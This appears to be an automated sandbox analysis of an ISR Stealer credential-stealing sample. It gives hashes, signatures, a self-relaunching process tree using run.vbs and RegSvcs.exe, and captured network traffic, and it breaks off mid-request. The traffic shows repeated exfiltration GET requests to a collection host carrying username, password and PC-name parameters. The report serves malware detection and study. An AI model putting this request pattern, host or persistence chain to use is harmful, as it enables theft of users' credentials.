Analysis

  • max time kernel
    151s
  • max time network
    152s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    15/11/2020, 23:15 UTC

General

  • Target

    d265fcb40a443162e0da3274ca4a0c81418c12756b929b29f34688abddae01b5.exe

  • Size

    1.2MB

  • MD5

    e9fea729bae2bd3a20d61829dc12c806

  • SHA1

    d89fe8744aae2fa5164163045d6f91540cd49213

  • SHA256

    d265fcb40a443162e0da3274ca4a0c81418c12756b929b29f34688abddae01b5

  • SHA512

    9d60873b85bb2128e35258789b7c40d3d29a8ff476272759844bb8f74fd665fb82dcbe9672e9311b0c7537d6ab1f8662ac43abe8bc7aa4b63519b03d0fb45ab3

Malware Config

Signatures

  • ISR Stealer

    ISR Stealer is a modified version of Hackhound Stealer written in Visual Basic.

  • ISR Stealer Payload 13 IoCs
  • NirSoft MailPassView 7 IoCs

    Password recovery tool for various email clients

  • Nirsoft 7 IoCs
  • Executes dropped EXE 13 IoCs
  • UPX packed file 38 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Loads dropped DLL 16 IoCs
  • Adds Run key to start application 2 TTPs 26 IoCs
  • Checks whether UAC is enabled 1 TTPs 13 IoCs
  • Suspicious use of SetThreadContext 35 IoCs
  • Suspicious behavior: EnumeratesProcesses 567 IoCs
  • Suspicious use of AdjustPrivilegeToken 253 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 566 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\d265fcb40a443162e0da3274ca4a0c81418c12756b929b29f34688abddae01b5.exe
    "C:\Users\Admin\AppData\Local\Temp\d265fcb40a443162e0da3274ca4a0c81418c12756b929b29f34688abddae01b5.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1580
    • C:\Users\Admin\e9h2a4n\eYmFqcBd.exe
      "C:\Users\Admin\e9h2a4n\eYmFqcBd.exe" CTHiXWASNE.ELH
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • Checks whether UAC is enabled
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:872
      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
        3⤵
        • Suspicious use of SetThreadContext
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:400
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
          /scomma "C:\Users\Admin\AppData\Local\Temp\cf7RAmgFQF.ini"
          4⤵
            PID:1124
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
            /scomma "C:\Users\Admin\AppData\Local\Temp\23c0n5x3l4.ini"
            4⤵
              PID:2016
          • C:\Windows\SysWOW64\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\e9h2a4n\run.vbs"
            3⤵
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:2004
            • C:\Users\Admin\e9h2a4n\eYmFqcBd.exe
              "C:\Users\Admin\e9h2a4n\eYmFqcBd.exe" CTHiXWASNE.ELH
              4⤵
              • Executes dropped EXE
              • Adds Run key to start application
              • Checks whether UAC is enabled
              • Suspicious use of SetThreadContext
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:1620
              • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
                5⤵
                • Suspicious use of SetThreadContext
                • Suspicious use of SetWindowsHookEx
                • Suspicious use of WriteProcessMemory
                PID:1440
                • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                  /scomma "C:\Users\Admin\AppData\Local\Temp\5HEEMUkSbD.ini"
                  6⤵
                    PID:688
                  • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                    /scomma "C:\Users\Admin\AppData\Local\Temp\f5pXjfyd35.ini"
                    6⤵
                      PID:1884
                  • C:\Windows\SysWOW64\WScript.exe
                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\e9h2a4n\run.vbs"
                    5⤵
                    • Loads dropped DLL
                    PID:1572
                    • C:\Users\Admin\e9h2a4n\eYmFqcBd.exe
                      "C:\Users\Admin\e9h2a4n\eYmFqcBd.exe" CTHiXWASNE.ELH
                      6⤵
                      • Executes dropped EXE
                      • Adds Run key to start application
                      • Checks whether UAC is enabled
                      • Suspicious use of SetThreadContext
                      • Suspicious use of AdjustPrivilegeToken
                      PID:316
                      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
                        7⤵
                        • Suspicious use of SetThreadContext
                        • Suspicious use of SetWindowsHookEx
                        PID:476
                        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                          /scomma "C:\Users\Admin\AppData\Local\Temp\VB3BJIORwL.ini"
                          8⤵
                            PID:1224
                          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                            /scomma "C:\Users\Admin\AppData\Local\Temp\2wLjxQGzKE.ini"
                            8⤵
                              PID:1912
                          • C:\Windows\SysWOW64\WScript.exe
                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\e9h2a4n\run.vbs"
                            7⤵
                            • Loads dropped DLL
                            PID:1884
                            • C:\Users\Admin\e9h2a4n\eYmFqcBd.exe
                              "C:\Users\Admin\e9h2a4n\eYmFqcBd.exe" CTHiXWASNE.ELH
                              8⤵
                              • Executes dropped EXE
                              • Adds Run key to start application
                              • Checks whether UAC is enabled
                              • Suspicious use of SetThreadContext
                              PID:1148
                              • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
                                9⤵
                                • Suspicious use of SetThreadContext
                                • Suspicious use of SetWindowsHookEx
                                PID:1572
                                • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                  /scomma "C:\Users\Admin\AppData\Local\Temp\xlX0uAlM1X.ini"
                                  10⤵
                                    PID:1340
                                  • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                    /scomma "C:\Users\Admin\AppData\Local\Temp\FDoTHsjGYT.ini"
                                    10⤵
                                      PID:948
                                  • C:\Windows\SysWOW64\WScript.exe
                                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\e9h2a4n\run.vbs"
                                    9⤵
                                    • Loads dropped DLL
                                    PID:1964
                                    • C:\Users\Admin\e9h2a4n\eYmFqcBd.exe
                                      "C:\Users\Admin\e9h2a4n\eYmFqcBd.exe" CTHiXWASNE.ELH
                                      10⤵
                                      • Executes dropped EXE
                                      • Adds Run key to start application
                                      • Checks whether UAC is enabled
                                      • Suspicious use of SetThreadContext
                                      PID:1928
                                      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
                                        11⤵
                                        • Suspicious use of SetThreadContext
                                        • Suspicious use of SetWindowsHookEx
                                        PID:2016
                                        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                          /scomma "C:\Users\Admin\AppData\Local\Temp\Atsta9kW8S.ini"
                                          12⤵
                                            PID:1336
                                          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                            /scomma "C:\Users\Admin\AppData\Local\Temp\5F1tqlOL5P.ini"
                                            12⤵
                                              PID:2044
                                          • C:\Windows\SysWOW64\WScript.exe
                                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\e9h2a4n\run.vbs"
                                            11⤵
                                            • Loads dropped DLL
                                            PID:852
                                            • C:\Users\Admin\e9h2a4n\eYmFqcBd.exe
                                              "C:\Users\Admin\e9h2a4n\eYmFqcBd.exe" CTHiXWASNE.ELH
                                              12⤵
                                              • Executes dropped EXE
                                              • Adds Run key to start application
                                              • Checks whether UAC is enabled
                                              • Suspicious use of SetThreadContext
                                              PID:1708
                                              • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
                                                13⤵
                                                • Suspicious use of SetThreadContext
                                                • Suspicious use of SetWindowsHookEx
                                                PID:476
                                                • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                  /scomma "C:\Users\Admin\AppData\Local\Temp\ta3VJOn2dt.ini"
                                                  14⤵
                                                    PID:1964
                                                  • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                    /scomma "C:\Users\Admin\AppData\Local\Temp\ZwTwUTHYka.ini"
                                                    14⤵
                                                      PID:1568
                                                  • C:\Windows\SysWOW64\WScript.exe
                                                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\e9h2a4n\run.vbs"
                                                    13⤵
                                                    • Loads dropped DLL
                                                    PID:1340
                                                    • C:\Users\Admin\e9h2a4n\eYmFqcBd.exe
                                                      "C:\Users\Admin\e9h2a4n\eYmFqcBd.exe" CTHiXWASNE.ELH
                                                      14⤵
                                                      • Executes dropped EXE
                                                      • Adds Run key to start application
                                                      • Checks whether UAC is enabled
                                                      • Suspicious use of SetThreadContext
                                                      PID:620
                                                      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
                                                        15⤵
                                                        • Suspicious use of SetThreadContext
                                                        • Suspicious use of SetWindowsHookEx
                                                        PID:1028
                                                        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                          /scomma "C:\Users\Admin\AppData\Local\Temp\kbKlLqjJcV.ini"
                                                          16⤵
                                                            PID:744
                                                          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                            /scomma "C:\Users\Admin\AppData\Local\Temp\9LucVHGLDo.ini"
                                                            16⤵
                                                              PID:1760
                                                          • C:\Windows\SysWOW64\WScript.exe
                                                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\e9h2a4n\run.vbs"
                                                            15⤵
                                                            • Loads dropped DLL
                                                            PID:1224
                                                            • C:\Users\Admin\e9h2a4n\eYmFqcBd.exe
                                                              "C:\Users\Admin\e9h2a4n\eYmFqcBd.exe" CTHiXWASNE.ELH
                                                              16⤵
                                                              • Executes dropped EXE
                                                              • Adds Run key to start application
                                                              • Checks whether UAC is enabled
                                                              • Suspicious use of SetThreadContext
                                                              PID:1756
                                                              • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                                "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
                                                                17⤵
                                                                • Suspicious use of SetThreadContext
                                                                • Suspicious use of SetWindowsHookEx
                                                                PID:1932
                                                                • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                                  /scomma "C:\Users\Admin\AppData\Local\Temp\H9CXmAn0p2.ini"
                                                                  18⤵
                                                                    PID:736
                                                                  • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                                    /scomma "C:\Users\Admin\AppData\Local\Temp\JoaRSBMfOl.ini"
                                                                    18⤵
                                                                      PID:1448
                                                                  • C:\Windows\SysWOW64\WScript.exe
                                                                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\e9h2a4n\run.vbs"
                                                                    17⤵
                                                                    • Loads dropped DLL
                                                                    PID:1220
                                                                    • C:\Users\Admin\e9h2a4n\eYmFqcBd.exe
                                                                      "C:\Users\Admin\e9h2a4n\eYmFqcBd.exe" CTHiXWASNE.ELH
                                                                      18⤵
                                                                      • Executes dropped EXE
                                                                      • Adds Run key to start application
                                                                      • Checks whether UAC is enabled
                                                                      • Suspicious use of SetThreadContext
                                                                      PID:1320
                                                                      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                                        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
                                                                        19⤵
                                                                        • Suspicious use of SetThreadContext
                                                                        • Suspicious use of SetWindowsHookEx
                                                                        PID:1740
                                                                        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                                          /scomma "C:\Users\Admin\AppData\Local\Temp\3jmnzjiWSY.ini"
                                                                          20⤵
                                                                            PID:1016
                                                                          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                                            /scomma "C:\Users\Admin\AppData\Local\Temp\jR3uPCfdqG.ini"
                                                                            20⤵
                                                                              PID:948
                                                                          • C:\Windows\SysWOW64\WScript.exe
                                                                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\e9h2a4n\run.vbs"
                                                                            19⤵
                                                                            • Loads dropped DLL
                                                                            PID:1224
                                                                            • C:\Users\Admin\e9h2a4n\eYmFqcBd.exe
                                                                              "C:\Users\Admin\e9h2a4n\eYmFqcBd.exe" CTHiXWASNE.ELH
                                                                              20⤵
                                                                              • Executes dropped EXE
                                                                              • Adds Run key to start application
                                                                              • Checks whether UAC is enabled
                                                                              PID:1528
                                                                              • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                                                "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
                                                                                21⤵
                                                                                  PID:476
                                                                                • C:\Windows\SysWOW64\WScript.exe
                                                                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\e9h2a4n\run.vbs"
                                                                                  21⤵
                                                                                  • Loads dropped DLL
                                                                                  PID:1092
                                                                                  • C:\Users\Admin\e9h2a4n\eYmFqcBd.exe
                                                                                    "C:\Users\Admin\e9h2a4n\eYmFqcBd.exe" CTHiXWASNE.ELH
                                                                                    22⤵
                                                                                    • Executes dropped EXE
                                                                                    • Adds Run key to start application
                                                                                    • Checks whether UAC is enabled
                                                                                    • Suspicious use of SetThreadContext
                                                                                    PID:2036
                                                                                    • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                                                      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
                                                                                      23⤵
                                                                                      • Suspicious use of SetThreadContext
                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                      PID:1768
                                                                                      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                                                        /scomma "C:\Users\Admin\AppData\Local\Temp\zb3JPOscSk.ini"
                                                                                        24⤵
                                                                                          PID:320
                                                                                        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                                                          /scomma "C:\Users\Admin\AppData\Local\Temp\aNlIjieAmy.ini"
                                                                                          24⤵
                                                                                            PID:1160
                                                                                        • C:\Windows\SysWOW64\WScript.exe
                                                                                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\e9h2a4n\run.vbs"
                                                                                          23⤵
                                                                                          • Loads dropped DLL
                                                                                          PID:1188
                                                                                          • C:\Users\Admin\e9h2a4n\eYmFqcBd.exe
                                                                                            "C:\Users\Admin\e9h2a4n\eYmFqcBd.exe" CTHiXWASNE.ELH
                                                                                            24⤵
                                                                                            • Executes dropped EXE
                                                                                            • Adds Run key to start application
                                                                                            • Checks whether UAC is enabled
                                                                                            • Suspicious use of SetThreadContext
                                                                                            PID:1584
                                                                                            • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                                                              "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
                                                                                              25⤵
                                                                                              • Suspicious use of SetThreadContext
                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                              PID:1928
                                                                                              • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                                                                /scomma "C:\Users\Admin\AppData\Local\Temp\4VwvmfrBBD.ini"
                                                                                                26⤵
                                                                                                  PID:880
                                                                                                • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                                                                  /scomma "C:\Users\Admin\AppData\Local\Temp\5Rwhlv6Tot.ini"
                                                                                                  26⤵
                                                                                                    PID:1832
                                                                                                • C:\Windows\SysWOW64\WScript.exe
                                                                                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\e9h2a4n\run.vbs"
                                                                                                  25⤵
                                                                                                  • Loads dropped DLL
                                                                                                  PID:1212
                                                                                                  • C:\Users\Admin\e9h2a4n\eYmFqcBd.exe
                                                                                                    "C:\Users\Admin\e9h2a4n\eYmFqcBd.exe" CTHiXWASNE.ELH
                                                                                                    26⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Adds Run key to start application
                                                                                                    • Checks whether UAC is enabled
                                                                                                    • Suspicious use of SetThreadContext
                                                                                                    PID:1516
                                                                                                    • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                                                                      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
                                                                                                      27⤵
                                                                                                      • Suspicious use of SetThreadContext
                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                      PID:1968
                                                                                                      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                                                                        /scomma "C:\Users\Admin\AppData\Local\Temp\M45z4RchMZ.ini"
                                                                                                        28⤵
                                                                                                          PID:1604

Network

  • DNS
    www.maga.site88.net
    Remote address:
    8.8.8.8:53
    Request
    www.maga.site88.net
    IN A
    Response
    www.maga.site88.net
    IN A
    153.92.0.100
  • GET
    http://www.maga.site88.net/index.php?action=add&username=&password=&app=&pcname=EIDQHRRL&sitename=
    RegSvcs.exe
    Remote address:
    153.92.0.100:80
    Request
    GET /index.php?action=add&username=&password=&app=&pcname=EIDQHRRL&sitename= HTTP/1.1
    User-Agent: HardCore Software For : Public
    Host: www.maga.site88.net
    Response
    HTTP/1.1 301 Moved Permanently
    Server: nginx
    Date: Mon, 16 Nov 2020 00:38:26 GMT
    Content-Type: text/html
    Content-Length: 162
    Connection: keep-alive
    Location: https://www.000webhost.com/migrate?static=true
    X-Frame-Options: sameorigin
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
  • DNS
    www.000webhost.com
    Remote address:
    8.8.8.8:53
    Request
    www.000webhost.com
    IN A
    Response
    www.000webhost.com
    IN A
    104.18.107.8
    www.000webhost.com
    IN A
    104.18.108.8
  • GET
    https://www.000webhost.com/migrate?static=true
    RegSvcs.exe
                                                    Remote address:
                                                    104.18.107.8:443
                                                    Request
                                                    GET /migrate?static=true HTTP/1.1
                                                    User-Agent: HardCore Software For : Public
                                                    Host: www.000webhost.com
                                                    Connection: Keep-Alive
                                                    Response
                                                    HTTP/1.1 403 Forbidden
                                                    Date: Mon, 16 Nov 2020 00:38:28 GMT
                                                    Content-Type: text/plain; charset=UTF-8
                                                    Content-Length: 16
                                                    Connection: keep-alive
                                                    X-Frame-Options: SAMEORIGIN
                                                    Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                    Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                    Set-Cookie: __cfduid=df0797842a1a9ba9881aaef87fae765061605487108; expires=Wed, 16-Dec-20 00:38:28 GMT; path=/; domain=.000webhost.com; HttpOnly; SameSite=Lax
                                                    cf-request-id: 067016380600001e7910237000000001
                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                    Server: cloudflare
                                                    CF-RAY: 5f2d2639ae691e79-AMS
                                                  • flag-unknown
                                                    DNS
                                                    www.download.windowsupdate.com
                                                    Remote address:
                                                    8.8.8.8:53
                                                    Request
                                                    www.download.windowsupdate.com
                                                    IN A
                                                    Response
                                                    www.download.windowsupdate.com
                                                    IN CNAME
                                                    wu-fg-shim.trafficmanager.net
                                                    wu-fg-shim.trafficmanager.net
                                                    IN CNAME
                                                    2-01-3cf7-0009.cdx.cedexis.net
                                                    2-01-3cf7-0009.cdx.cedexis.net
                                                    IN CNAME
                                                    wu.azureedge.net
                                                    wu.azureedge.net
                                                    IN CNAME
                                                    wu.ec.azureedge.net
                                                    wu.ec.azureedge.net
                                                    IN CNAME
                                                    wu.wpc.apr-52dd2.edgecastdns.net
                                                    wu.wpc.apr-52dd2.edgecastdns.net
                                                    IN CNAME
                                                    hlb.apr-52dd2-0.edgecastdns.net
                                                    hlb.apr-52dd2-0.edgecastdns.net
                                                    IN CNAME
                                                    cs11.wpc.v0cdn.net
                                                    cs11.wpc.v0cdn.net
                                                    IN A
                                                    72.21.81.240
                                                  • flag-unknown
                                                    GET
                                                    http://www.maga.site88.net/index.php?action=add&username=&password=&app=&pcname=EIDQHRRL&sitename=
                                                    RegSvcs.exe
                                                    Remote address:
                                                    153.92.0.100:80
                                                    Request
                                                    GET /index.php?action=add&username=&password=&app=&pcname=EIDQHRRL&sitename= HTTP/1.1
                                                    User-Agent: HardCore Software For : Public
                                                    Host: www.maga.site88.net
                                                    Response
                                                    HTTP/1.1 301 Moved Permanently
                                                    Server: nginx
                                                    Date: Mon, 16 Nov 2020 00:38:41 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 162
                                                    Connection: keep-alive
                                                    Location: https://www.000webhost.com/migrate?static=true
                                                    X-Frame-Options: sameorigin
                                                    X-Content-Type-Options: nosniff
                                                    X-XSS-Protection: 1; mode=block
                                                  • flag-unknown
                                                    GET
                                                    https://www.000webhost.com/migrate?static=true
                                                    RegSvcs.exe
                                                    Remote address:
                                                    104.18.107.8:443
                                                    Request
                                                    GET /migrate?static=true HTTP/1.1
                                                    User-Agent: HardCore Software For : Public
                                                    Host: www.000webhost.com
                                                    Connection: Keep-Alive
                                                    Cookie: __cfduid=df0797842a1a9ba9881aaef87fae765061605487108
                                                    Response
                                                    HTTP/1.1 403 Forbidden
                                                    Date: Mon, 16 Nov 2020 00:38:41 GMT
                                                    Content-Type: text/plain; charset=UTF-8
                                                    Content-Length: 16
                                                    Connection: keep-alive
                                                    X-Frame-Options: SAMEORIGIN
                                                    Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                    Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                    cf-request-id: 0670166c2700001e8124a9c000000001
                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                    Server: cloudflare
                                                    CF-RAY: 5f2d268d0a271e81-AMS
                                                  • flag-unknown
                                                    GET
                                                    http://www.maga.site88.net/index.php?action=add&username=&password=&app=&pcname=EIDQHRRL&sitename=
                                                    RegSvcs.exe
                                                    Remote address:
                                                    153.92.0.100:80
                                                    Request
                                                    GET /index.php?action=add&username=&password=&app=&pcname=EIDQHRRL&sitename= HTTP/1.1
                                                    User-Agent: HardCore Software For : Public
                                                    Host: www.maga.site88.net
                                                    Response
                                                    HTTP/1.1 301 Moved Permanently
                                                    Server: nginx
                                                    Date: Mon, 16 Nov 2020 00:38:53 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 162
                                                    Connection: keep-alive
                                                    Location: https://www.000webhost.com/migrate?static=true
                                                    X-Frame-Options: sameorigin
                                                    X-Content-Type-Options: nosniff
                                                    X-XSS-Protection: 1; mode=block
                                                  • flag-unknown
                                                    GET
                                                    https://www.000webhost.com/migrate?static=true
                                                    RegSvcs.exe
                                                    Remote address:
                                                    104.18.107.8:443
                                                    Request
                                                    GET /migrate?static=true HTTP/1.1
                                                    User-Agent: HardCore Software For : Public
                                                    Host: www.000webhost.com
                                                    Connection: Keep-Alive
                                                    Cookie: __cfduid=df0797842a1a9ba9881aaef87fae765061605487108
                                                    Response
                                                    HTTP/1.1 403 Forbidden
                                                    Date: Mon, 16 Nov 2020 00:38:54 GMT
                                                    Content-Type: text/plain; charset=UTF-8
                                                    Content-Length: 16
                                                    Connection: keep-alive
                                                    X-Frame-Options: SAMEORIGIN
                                                    Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                    Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                    cf-request-id: 0670169d3f0000fa146226f000000001
                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                    Server: cloudflare
                                                    CF-RAY: 5f2d26db9c9ffa14-AMS
                                                  • flag-unknown
                                                    DNS
                                                    crl.verisign.com
                                                    Remote address:
                                                    8.8.8.8:53
                                                    Request
                                                    crl.verisign.com
                                                    IN A
                                                    Response
                                                    crl.verisign.com
                                                    IN CNAME
                                                    crl-symcprod.digicert.com
                                                    crl-symcprod.digicert.com
                                                    IN CNAME
                                                    cs9.wac.phicdn.net
                                                    cs9.wac.phicdn.net
                                                    IN A
                                                    93.184.220.29
                                                  • flag-unknown
                                                    GET
                                                    http://www.maga.site88.net/index.php?action=add&username=&password=&app=&pcname=EIDQHRRL&sitename=
                                                    RegSvcs.exe
                                                    Remote address:
                                                    153.92.0.100:80
                                                    Request
                                                    GET /index.php?action=add&username=&password=&app=&pcname=EIDQHRRL&sitename= HTTP/1.1
                                                    User-Agent: HardCore Software For : Public
                                                    Host: www.maga.site88.net
                                                    Response
                                                    HTTP/1.1 301 Moved Permanently
                                                    Server: nginx
                                                    Date: Mon, 16 Nov 2020 00:39:06 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 162
                                                    Connection: keep-alive
                                                    Location: https://www.000webhost.com/migrate?static=true
                                                    X-Frame-Options: sameorigin
                                                    X-Content-Type-Options: nosniff
                                                    X-XSS-Protection: 1; mode=block
                                                  • flag-unknown
                                                    GET
                                                    https://www.000webhost.com/migrate?static=true
                                                    RegSvcs.exe
                                                    Remote address:
                                                    104.18.107.8:443
                                                    Request
                                                    GET /migrate?static=true HTTP/1.1
                                                    User-Agent: HardCore Software For : Public
                                                    Host: www.000webhost.com
                                                    Connection: Keep-Alive
                                                    Cookie: __cfduid=df0797842a1a9ba9881aaef87fae765061605487108
                                                    Response
                                                    HTTP/1.1 403 Forbidden
                                                    Date: Mon, 16 Nov 2020 00:39:06 GMT
                                                    Content-Type: text/plain; charset=UTF-8
                                                    Content-Length: 16
                                                    Connection: keep-alive
                                                    X-Frame-Options: SAMEORIGIN
                                                    Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                    Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                    cf-request-id: 067016cf770000fa24ad39d000000001
                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                    Server: cloudflare
                                                    CF-RAY: 5f2d272bffe0fa24-AMS
                                                  • flag-unknown
                                                    GET
                                                    http://www.maga.site88.net/index.php?action=add&username=&password=&app=&pcname=EIDQHRRL&sitename=
                                                    RegSvcs.exe
                                                    Remote address:
                                                    153.92.0.100:80
                                                    Request
                                                    GET /index.php?action=add&username=&password=&app=&pcname=EIDQHRRL&sitename= HTTP/1.1
                                                    User-Agent: HardCore Software For : Public
                                                    Host: www.maga.site88.net
                                                    Response
                                                    HTTP/1.1 301 Moved Permanently
                                                    Server: nginx
                                                    Date: Mon, 16 Nov 2020 00:39:19 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 162
                                                    Connection: keep-alive
                                                    Location: https://www.000webhost.com/migrate?static=true
                                                    X-Frame-Options: sameorigin
                                                    X-Content-Type-Options: nosniff
                                                    X-XSS-Protection: 1; mode=block
                                                  • flag-unknown
                                                    GET
                                                    https://www.000webhost.com/migrate?static=true
                                                    RegSvcs.exe
                                                    Remote address:
                                                    104.18.107.8:443
                                                    Request
                                                    GET /migrate?static=true HTTP/1.1
                                                    User-Agent: HardCore Software For : Public
                                                    Host: www.000webhost.com
                                                    Connection: Keep-Alive
                                                    Cookie: __cfduid=df0797842a1a9ba9881aaef87fae765061605487108
                                                    Response
                                                    HTTP/1.1 403 Forbidden
                                                    Date: Mon, 16 Nov 2020 00:39:19 GMT
                                                    Content-Type: text/plain; charset=UTF-8
                                                    Content-Length: 16
                                                    Connection: keep-alive
                                                    X-Frame-Options: SAMEORIGIN
                                                    Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                    Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                    cf-request-id: 06701700ff00000c0de3910000000001
                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                    Server: cloudflare
                                                    CF-RAY: 5f2d277b3e690c0d-AMS
                                                  • flag-unknown
                                                    GET
                                                    http://www.maga.site88.net/index.php?action=add&username=&password=&app=&pcname=EIDQHRRL&sitename=
                                                    RegSvcs.exe
                                                    Remote address:
                                                    153.92.0.100:80
                                                    Request
                                                    GET /index.php?action=add&username=&password=&app=&pcname=EIDQHRRL&sitename= HTTP/1.1
                                                    User-Agent: HardCore Software For : Public
                                                    Host: www.maga.site88.net
                                                    Response
                                                    HTTP/1.1 301 Moved Permanently
                                                    Server: nginx
                                                    Date: Mon, 16 Nov 2020 00:39:31 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 162
                                                    Connection: keep-alive
                                                    Location: https://www.000webhost.com/migrate?static=true
                                                    X-Frame-Options: sameorigin
                                                    X-Content-Type-Options: nosniff
                                                    X-XSS-Protection: 1; mode=block
                                                  • flag-unknown
                                                    GET
                                                    https://www.000webhost.com/migrate?static=true
                                                    RegSvcs.exe
                                                    Remote address:
                                                    104.18.107.8:443
                                                    Request
